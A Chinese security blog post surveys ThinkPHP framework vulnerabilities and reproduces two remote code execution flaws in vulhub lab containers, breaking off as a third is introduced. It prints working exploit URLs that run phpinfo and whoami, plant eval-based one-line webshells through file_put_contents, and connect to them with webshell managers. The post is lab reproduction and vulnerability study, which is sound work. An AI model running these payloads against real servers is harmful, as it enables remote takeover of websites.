Think PHP漏洞总结（全系列）

江郎心 發表於 2021-12-24 20:40:00

<h1 id="tid-rjNbKz" class="heading-h1">0x01 组件介绍</h1>
<div data-zone-id="0" data-line-index="2">
<h2 id="tid-sDG6Ac" class="heading-h2">1.1 基本信息</h2>
</div>
<div data-zone-id="0" data-line-index="3">ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，遵循Apache 2开源协议发布，使用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib（标签库）、RoR的ORM映射和ActiveRecord模式。</div>
<div data-zone-id="0" data-line-index="4">ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP 5.0以上版本，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。</div>
<div data-zone-id="0" data-line-index="5">
<h2 id="tid-tcnNZ7" class="heading-h2">1.2 版本介绍</h2>
</div>
<div data-zone-id="0" data-line-index="6">ThinkPHP发展至今，核心版本主要有以下几个系列，ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列，各个系列之间在代码实现及功能方面，有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护，ThinkPHP 5系列现使用最多，而ThinkPHP 3系列也积累了较多的历史用户。版本细分如下图所示：</div>
<div data-zone-id="0" data-line-index="7">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"d5c9d993-1871-4b9e-acdf-f2ff9358d201","height":"402","width":"690","currHeight":"402","currWidth":"690","natrualHeight":"402","natrualWidth":"690","file_token":"boxcnDPnKpDwdwyPjKWOTMh0CGb","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnDPnKpDwdwyPjKWOTMh0CGb%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":74963,"comments":[],"pluginName":"imageUpload","scale":1.7164179104477613}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202630881-1122680534.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="8">
<h1 id="tid-RHd5My" class="heading-h1">0x02 高危漏洞介绍</h1>
</div>
<div data-zone-id="0" data-line-index="9">通过对ThinkPHP漏洞的收集和整理，过滤出其中的高危漏洞，可以得出如下列表：</div>
<div data-zone-id="0" data-line-index="10">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"d258b425-a126-4684-bb0e-e6e1b7f721a3","height":"658","width":"617","currHeight":"658","currWidth":"617","natrualHeight":"658","natrualWidth":"617","file_token":"boxcnP5GnoxMce43OuTcsuff55d","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnP5GnoxMce43OuTcsuff55d%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":266931,"comments":[],"pluginName":"imageUpload","scale":0.9376899696048632}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202706861-1740606751.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="11">从上表数据来看，ThinkPHP 3系列版本的漏洞多是2016/2017年被爆出，而ThinkPHP 5系列版本的漏洞基本为2017/2018年被爆出，从2020年开始，ThinkPHP 6系列的漏洞也开始被挖掘。</div>
<div data-zone-id="0" data-line-index="12"> </div>
<div data-zone-id="0" data-line-index="13">从中可以看出，ThinkPHP近年出现的高风险漏洞主要存在于框架中的函数，这些漏洞均需要在二次开发的过程中使用了这些风险函数方可利用，所以这些漏洞更应该被称为框架中的风险函数，且这些风险点大部分可导致SQL注入漏洞，所以，开发者在利用ThinkPHP进行Web开发的过程中，一定需要关注这些框架的历史风险点，尽量规避这些函数或者版本，则可保证web应用的安全性。</div>
<div data-zone-id="0" data-line-index="13"> </div>
<div data-zone-id="0" data-line-index="14">
<h1 id="tid-ahpDpC" class="heading-h1">0x03 漏洞利用链</h1>
</div>
<div data-zone-id="0" data-line-index="15">
<h2 id="tid-7xwwrw" class="heading-h2">3.1 暴露面梳理</h2>
</div>
<div data-zone-id="0" data-line-index="16">根据ThinkPHP的历史高危漏洞，梳理出分版本的攻击风险点，开发人员可根据以下图标，来规避ThinkPHP的风险版本，如下ThinkPHP暴露面脑图。</div>
<div data-zone-id="0" data-line-index="17">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"c9d3e52c-3229-4dc8-8ee0-6f777a33a01e","height":"703","width":"690","currHeight":"703","currWidth":"690","natrualHeight":"703","natrualWidth":"690","file_token":"boxcnm8ezpkJ3q0crPbmfoqxte8","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2Fboxcnm8ezpkJ3q0crPbmfoqxte8%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":191605,"comments":[],"pluginName":"imageUpload","scale":0.9815078236130867}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202828226-1632208246.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="18">
<h2 id="tid-SYTnNr" class="heading-h2">3.2 利用链总结</h2>
</div>
<div data-zone-id="0" data-line-index="19">基于暴露面脑图，我们可以得出几种可以直接利用的ThinkPHP框架漏洞利用链，不需要进行二次开发。</div>
<div data-zone-id="0" data-line-index="20">
<h3 id="tid-SMJThj" class="heading-h3">3.2.1 ThinkPHP 2.x/3.0 GetShell</h3>
</div>
<div data-zone-id="0" data-line-index="21">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"d13c4ca1-c91a-4964-92dc-f385daec8631","height":"100","width":"690","currHeight":"100","currWidth":"690","natrualHeight":"100","natrualWidth":"690","file_token":"boxcnoRsPJfnsgbMHLFVuNuH9Fd","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnoRsPJfnsgbMHLFVuNuH9Fd%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":24698,"comments":[],"pluginName":"imageUpload","scale":6.9}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202846978-632186751.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="22">ThinkPHP 低于3.0 - GetShell</div>
<div data-zone-id="0" data-line-index="23">ThinkPHP 低版本可以使用以上漏洞执行任意系统命令，获取服务器权限。</div>
<div data-zone-id="0" data-line-index="24">
<h3 id="tid-YmzsCf" class="heading-h3">3.2.2 ThinkPHP 5.0 GetShell</h3>
</div>
<div data-zone-id="0" data-line-index="25">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"a7a58005-43a5-4aab-a0e5-a80bfac67b84","height":"219","width":"690","currHeight":"219","currWidth":"690","natrualHeight":"219","natrualWidth":"690","file_token":"boxcn6CtFlTKcg5NHq2LuHTPYTh","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2Fboxcn6CtFlTKcg5NHq2LuHTPYTh%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":56002,"comments":[],"pluginName":"imageUpload","scale":3.1506849315068495}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202858742-1691585409.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="26">ThinkPHP 5.0.x - GetShell</div>
<div data-zone-id="0" data-line-index="27">首先明确ThinkPHP框架系列版本。</div>
<div data-zone-id="0" data-line-index="28">根据ThinkPHP版本，如是0.x版本，即可使用ThinkPHP 5.x远程代码执行漏洞，无需登录，即可执行任意命令，获取服务器最高权限。</div>
<div data-zone-id="0" data-line-index="29">
<h3 id="tid-N63cek" class="heading-h3">3.2.3 ThinkPHP 5.1 GetShell</h3>
</div>
<div data-zone-id="0" data-line-index="30">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"1fed9990-d8dd-446b-97c1-b3efcf97b615","height":"233","width":"690","currHeight":"233","currWidth":"690","natrualHeight":"233","natrualWidth":"690","file_token":"boxcnNQsMMcA2snL67KnWo6PBjg","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnNQsMMcA2snL67KnWo6PBjg%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":46742,"comments":[],"pluginName":"imageUpload","scale":2.96137339055794}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202924214-752030668.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="31">ThinkPHP 5.1.x - GetShell</div>
<div data-zone-id="0" data-line-index="32">首先明确ThinkPHP框架系列版本。</div>
<div data-zone-id="0" data-line-index="33">根据ThinkPHP版本，如是1.x版本，即可使用ThinkPHP 5.x远程代码执行漏洞1，无需登录，即可执行任意命令，获取服务器最高权限。</div>
<div data-zone-id="0" data-line-index="34">如需使用ThinkPHP 5.x远程代码执行漏洞2，则需要php文件中跳过报错提示，即文件中有语句：“error_reporting(0);”，故该漏洞在5.1.x系列版本利用需要满足以上前提，利用较难。</div>
<div data-zone-id="0" data-line-index="34"> </div>
<div data-zone-id="0" data-line-index="35">
<h1 id="tid-fa8xzH" class="heading-h1">0x04 高危利用漏洞分析</h1>
</div>
<div data-zone-id="0" data-line-index="36">从高危漏洞列表中，针对ThinkPHP不需二次开发即可利用的高危漏洞进行深入分析。</div>
<div data-zone-id="0" data-line-index="37">从高危漏洞列表中，针对ThinkPHP不需二次开发即可利用的高危漏洞进行深入分析。</div>
<div data-zone-id="0" data-line-index="38"> </div>
<div data-zone-id="0" data-line-index="39">
<h2 id="tid-csHARX" class="heading-h2">4.1 ThinkPHP 2.x/3.0远程代码执行漏洞</h2>
</div>
<div data-zone-id="0" data-line-index="40">
<h3 id="tid-WQtJfN" class="heading-h3">4.1.1 漏洞概要</h3>
</div>
<div data-zone-id="0" data-line-index="41">
<blockquote>漏洞名称：ThinkPHP 2.x/3.0远程代码执行</blockquote>
</div>
<div data-zone-id="0" data-line-index="42">
<blockquote>参考编号：无</blockquote>
</div>
<div data-zone-id="0" data-line-index="43">
<blockquote>威胁等级：高危</blockquote>
</div>
<div data-zone-id="0" data-line-index="44">
<blockquote>影响范围：ThinkPHP 2.x/3.0</blockquote>
</div>
<div data-zone-id="0" data-line-index="45">
<blockquote>漏洞类型：远程代码执行</blockquote>
</div>
<div data-zone-id="0" data-line-index="46">
<blockquote>利用难度：简单</blockquote>
</div>
<div data-zone-id="0" data-line-index="47">
<h3 id="tid-8KEFa7" class="heading-h3">4.1.2 漏洞描述</h3>
</div>
<div data-zone-id="0" data-line-index="48">ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架。Dispatcher.class.php中res参数中使用了preg_replace的/e危险参数，使得preg_replace第二个参数就会被当做php代码执行，导致存在一个代码执行漏洞，攻击者可以利用构造的恶意URL执行任意PHP代码。</div>
<div data-zone-id="0" data-line-index="49">
<h3 id="tid-sH8JwS" class="heading-h3">4.1.3 漏洞分析</h3>
</div>
<div data-zone-id="0" data-line-index="50">漏洞存在在文件 /ThinkPHP/Lib/Think/Util/Dispatcher.class.php 中，ThinkPHP 2.x版本中使用preg_replace的/e模式匹配路由，我们都知道，preg_replace的/e模式，和php双引号都能导致代码执行的，即漏洞触发点在102行的解析url路径的preg_replace函数中。代码如下：</div>
<div data-zone-id="0" data-line-index="51">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"7fe19823-c788-4e92-b718-9746de5e3b65","height":"206","width":"690","currHeight":"206","currWidth":"690","natrualHeight":"206","natrualWidth":"690","file_token":"boxcnEkauBxPWWxMWxNUvRUKq9b","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnEkauBxPWWxMWxNUvRUKq9b%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":89736,"comments":[],"pluginName":"imageUpload","scale":3.349514563106796}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202943157-788866922.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="52">该代码块首先检测路由规则，如果没有制定规则则按照默认规则进行URL调度，在preg_replace()函数中，正则表达式中使用了/e模式，将“替换字符串”作为PHP代码求值，并用其结果来替换所搜索的字符串。</div>
<div data-zone-id="0" data-line-index="53">正则表达式可以简化为“\w+/([^/])”，即搜索获取“/”前后的两个参数，$var[‘\1’]=”\2”;是对数组的操作，将之前搜索到的第一个值作为新数组的键，将第二个值作为新数组的值，我们发现可以构造搜索到的第二个值，即可执行任意PHP代码，在PHP中，我们可以使用${}里面可以执行函数，然后我们在thinkphp的url中的偶数位置使用${}格式的php代码，即可最终执行thinkphp任意代码执行漏洞，如下所示：</div>
<div data-zone-id="0" data-line-index="54">
<div data-zone-id="swyng5t91b" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-2RQFdH pre"></button>
<div class="code-tools"> </div>
<pre>index.php?s=a/b/c/${code}
index.php?s=a/b/c/${code}/d/e/f
index.php?s=a/b/c/d/e/${code}</pre>
</div>
</div>
</div>
<div data-zone-id="0" data-line-index="55">由于ThinkPHP存在两种路由规则，如下所示</div>
<ol start="1">
<li data-list="number1" data-ol-id="6r4Phlhb" data-start="1">http://serverName/index.php/模块/控制器/操作/[参数名/参数值...]</li>
<li data-list="number1" data-ol-id="6r4Phlhb" data-start="2">如果不支持PATHINFO的服务器可以使用兼容模式访问如下：</li>
<li data-list="number1" data-ol-id="6r4Phlhb" data-start="3">http://serverName/index.php?s=/模块/控制器/操作/[参数名/参数值...]</li>
</ol>
<div data-zone-id="0" data-line-index="59">也可采用 index.php/a/b/c/${code}一下形式。</div>
<div data-zone-id="0" data-line-index="60"> </div>
<div data-zone-id="0" data-line-index="61"><strong>分析：</strong><strong>ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行 - FreeBuf网络安全行业门户</strong></div>
<div data-zone-id="0" data-line-index="62">
<h3 id="tid-bxYWZy" class="heading-h3">4.1.4 漏洞复现</h3>
</div>
<div data-zone-id="0" data-line-index="63">
<h4 id="tid-fWzC88" class="heading-h4">环境搭建</h4>
</div>
<div data-zone-id="0" data-line-index="64">
<div data-zone-id="4mklk7jbnv" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-d8p5HQ pre"></button>
<div class="code-tools"> </div>
<pre>/vulhub/thinkphp/2-rce
docker-compose up -d</pre>
</div>
</div>
</div>
<div data-zone-id="0" data-line-index="65"> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202959957-781239462.png" alt="" loading="lazy">
<p> </p>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203010189-667902804.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="68">
<h4 id="tid-w8pJtd" class="heading-h4">验证漏洞</h4>
</div>
<div data-zone-id="0" data-line-index="69">
<div data-zone-id="8fjldxgqdp" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-BDFGaP pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=/index/index/name/${@phpinfo()}
http://192.168.1.21:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D)}</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203022642-2024841357.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="71">
<h4 id="tid-mhDbRe" class="heading-h4">工具利用</h4>
</div>
<div data-zone-id="0" data-line-index="72">ThinkphpGUI 2020HackingClub线下典藏版</div>
<div data-zone-id="0" data-line-index="73">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"7e30fd9b-6850-4bb4-8ec2-1073deead2f3","height":"585","width":"947","currHeight":"585","currWidth":"947","natrualHeight":"585","natrualWidth":"947","file_token":"boxcnjJ3JRRHzFocUSKVaEE4zLJ","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnjJ3JRRHzFocUSKVaEE4zLJ%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":40547,"comments":[],"pluginName":"imageUpload","scale":1.6188034188034188}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203044863-1937443136.png" alt="" loading="lazy">
<p> </p>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203112884-159295807.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="76">使用工具不能getshell</div>
<div data-zone-id="0" data-line-index="77">上传一句话木马</div>
<div data-zone-id="0" data-line-index="78">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-aAyAyc pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=a/b/c/${@print(eval($_POST))}</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203139515-412932237.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="80">菜刀连接</div>
<div data-zone-id="0" data-line-index="81">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-SRcBRr pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=a/b/c/${@print(eval($_POST))} 密码1</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203155153-116953991.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="83">蚁剑连接</div>
<div data-zone-id="0" data-line-index="84">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"1ef5e94f-bbfb-4c6d-b0d9-e3e7e836f992","height":"402","width":"1018","currHeight":"402","currWidth":"1018","natrualHeight":"402","natrualWidth":"1018","file_token":"boxcnwVVvrYcGcmfUa9biBjvX8c","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnwVVvrYcGcmfUa9biBjvX8c%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":32304,"comments":[],"pluginName":"imageUpload","scale":2.5323383084577116}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203207129-775220279.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="85">
<h2 id="tid-Zht7wK" class="heading-h2">4.2 ThinkPHP 5.x 远程代码执行漏洞1</h2>
</div>
<div data-zone-id="0" data-line-index="86">
<h3 id="tid-zfr3Ga" class="heading-h3">4.2.1 漏洞概要</h3>
</div>
<div data-zone-id="0" data-line-index="87">
<blockquote>漏洞名称：ThinkPHP 5.0.x-5.1.x 远程代码执行漏洞</blockquote>
</div>
<div data-zone-id="0" data-line-index="88">
<blockquote>参考编号：无</blockquote>
</div>
<div data-zone-id="0" data-line-index="89">
<blockquote>威胁等级：严重</blockquote>
</div>
<div data-zone-id="0" data-line-index="90">
<blockquote>影响范围：ThinkPHP v5.0.x < 5.0.23,ThinkPHP v5.1.x < 5.0.31</blockquote>
</div>
<div data-zone-id="0" data-line-index="91">
<blockquote>漏洞类型：远程代码执行</blockquote>
</div>
<div data-zone-id="0" data-line-index="92">
<blockquote>利用难度：容易</blockquote>
</div>
<div data-zone-id="0" data-line-index="93">
<h3 id="tid-ymwWRs" class="heading-h3">4.2.2 漏洞描述</h3>
</div>
<div data-zone-id="0" data-line-index="94">2018年12月10日，ThinkPHPv5系列发布安全更新，修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起，其覆盖面广，且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多，需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接进行远程的代码执行，进而获得服务器权限。</div>
<div data-zone-id="0" data-line-index="95">
<h3 id="tid-b44ynj" class="heading-h3">4.2.3 漏洞分析</h3>
</div>
<div data-zone-id="0" data-line-index="96">本次ThinkPHP 5.0的安全更新主要是在library/think/APP.php文件中增加了对控制器名的限制，而ThinkPHP 5.1的安全更新主要是在library/think/route/dispatch/Module.php文件中增加了对控制器名的限制。</div>
<div data-zone-id="0" data-line-index="97"><strong>分析过程：</strong><strong>ThinkPHP 5.x RCE分析_0verWatch的博客-CSDN博客_rce分析</strong></div>
<div data-zone-id="0" data-line-index="98">
<h3 id="tid-ESsrba" class="heading-h3">4.2.4 漏洞复现</h3>
</div>
<div data-zone-id="0" data-line-index="99">
<h4 id="tid-fciQp4" class="heading-h4">环境搭建</h4>
</div>
<div data-zone-id="0" data-line-index="100">
<div data-zone-id="jorpqpij6a" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-TEFAMY pre"></button>
<div class="code-tools"> </div>
<pre>/vulhub/thinkphp/5-rce
docker-compose up -d</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203220866-849111843.png" alt="" loading="lazy"></p>
<p> </p>
<p><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203233411-763067574.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="103">
<h4 id="tid-4Nmywr" class="heading-h4">验证漏洞</h4>
</div>
<div data-zone-id="0" data-line-index="104">
<div data-zone-id="7uzrelj1n2" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-zxxht8 pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=-1%20and%20it%27ll%20execute%20the%20phpinfo</pre>
</div>
<p> </p>
<img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203246915-498624312.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="106">任意代码执行</div>
<div data-zone-id="0" data-line-index="107">
<div data-zone-id="qh0sxrruiw" data-line-index="0">
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-hZ4KZt pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=whoami</pre>
</div>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203306469-951466578.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="109">写入webshell</div>
<div data-zone-id="0" data-line-index="110">
<div data-zone-id="flosazmi61" data-line-index="0"><?php eval($_POST);?> #需要进行url编码
<div class="cnblogs_code"><button class="clipboard code-copay-btn" type="button" data-clipboard-action="copy" data-clipboard-target="#code-aaAk5t pre"></button>
<div class="code-tools"> </div>
<pre>http://192.168.1.21:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=file_put_contents&vars[]=zcc.php&vars[]=%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%7a%63%63%27%5d%29%3b%3f%3e</pre>
</div>
<p> </p>
</div>
<div data-zone-id="flosazmi61" data-line-index="1"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203316460-1608957796.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="112">连接 http://192.168.1.21:8080/zcc.php 密码 zcc</div>
<div data-zone-id="0" data-line-index="113">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"2e20015a-a9f6-4646-b099-9204d894fb50","height":"514","width":"1125","currHeight":"514","currWidth":"1125","natrualHeight":"514","natrualWidth":"1125","file_token":"boxcnaNwGuaE0FmL7lZkDemjwzc","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnaNwGuaE0FmL7lZkDemjwzc%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":38891,"comments":[],"pluginName":"imageUpload","scale":2.188715953307393}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203328583-1052078272.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="114">工具检测</div>
<div data-zone-id="0" data-line-index="114"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203705767-1897579213.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
<div data-zone-id="0" data-line-index="115">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"a3804d17-3255-47d2-b63c-904fd84df4d4","height":"448","width":"844","currHeight":"448","currWidth":"844","natrualHeight":"448","natrualWidth":"844","file_token":"boxcnkALvbGo9zfu4Nhh7zPGZHf","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnkALvbGo9zfu4Nhh7zPGZHf%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":23764,"comments":[],"pluginName":"imageUpload","scale":1.8839285714285714}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203349426-519335841.png" alt="" loading="lazy">
<p> </p>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203402281-1627543486.png" alt="" loading="lazy"></p>
<p> </p>
<p> <img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203416070-1006870976.png" alt="" loading="lazy"></p>
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="118">http://192.168.1.21:8080//peiqi.php Pass:peiqi</div>
<div data-zone-id="0" data-line-index="119">
<div class="image-uploaded gallery" data-ace-gallery-json="{"items":[{"uuid":"226be404-bedd-464a-9109-fbcf7924a602","height":"477","width":"1159","currHeight":"477","currWidth":"1159","natrualHeight":"477","natrualWidth":"1159","file_token":"boxcnugG67RszYQAf5VaY3NfdVc","src":"https%3A%2F%2Finternal-api-drive-stream.feishu.cn%2Fspace%2Fapi%2Fbox%2Fstream%2Fdownload%2Fall%2FboxcnugG67RszYQAf5VaY3NfdVc%2F%3Fmount_node_token%3DdoccnWvnSnbxOXmv50nVKblT2Qc%26mount_point%3Ddoc_image","image_type":"image/png","size":47338,"comments":[],"pluginName":"imageUpload","scale":2.429769392033543}]}"><img src="https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224203740054-297120048.png" alt="" loading="lazy">
<p> </p>
<p> </p>
</div>
</div>
<div data-zone-id="0" data-line-index="120"> </div>
<div data-zone-id="0" data-line-index="121">
<h2 id="tid-Qy3ZRP" class="heading-h2">4.3 ThinkPHP 5.x 远程代码执行漏洞2</h2>
</div>
<div data-zone-id="0" data-line-index="122">
<h3 id="tid-7bi7YB" class="heading-h3">4.3.1 漏洞概要</h3>
</div>
<div data-zone-id="0" data-line-index="123">
<blockquote>漏洞名称：ThinkPHP 5.0.x-5.1.x远程代码执行漏洞</blockquote>
</div>
<div data-zone-id="0" data-line-index="124">
<blockquote>参考编号：无</blockquote>
</div>
<div data-zone-id="0" data-line-index="125">
<blockquote>威胁等级：严重</blockquote>
</div>
<div data-zone-id="0" data-line-index="126">
<blockquote>影响范围：ThinkPHP v5.0.x < 5.0.23,ThinkPHP v5.1.x < 5.0.31</blockquote>
</div>
<div data-zone-id="0" data-line-index="127">
<blockquote>漏洞类型：远程代码执行漏洞</blockquote>
</div>
<div data-zone-id="0" data-line-index="128">
<blockquote>利用难度：容易</blockquote>
</div>
<div data-zone-id="0" data-line-index="129">
<h3 id="tid-ESTxT5" class="heading-h3">4.3.2 漏洞描述</h3>
</div>
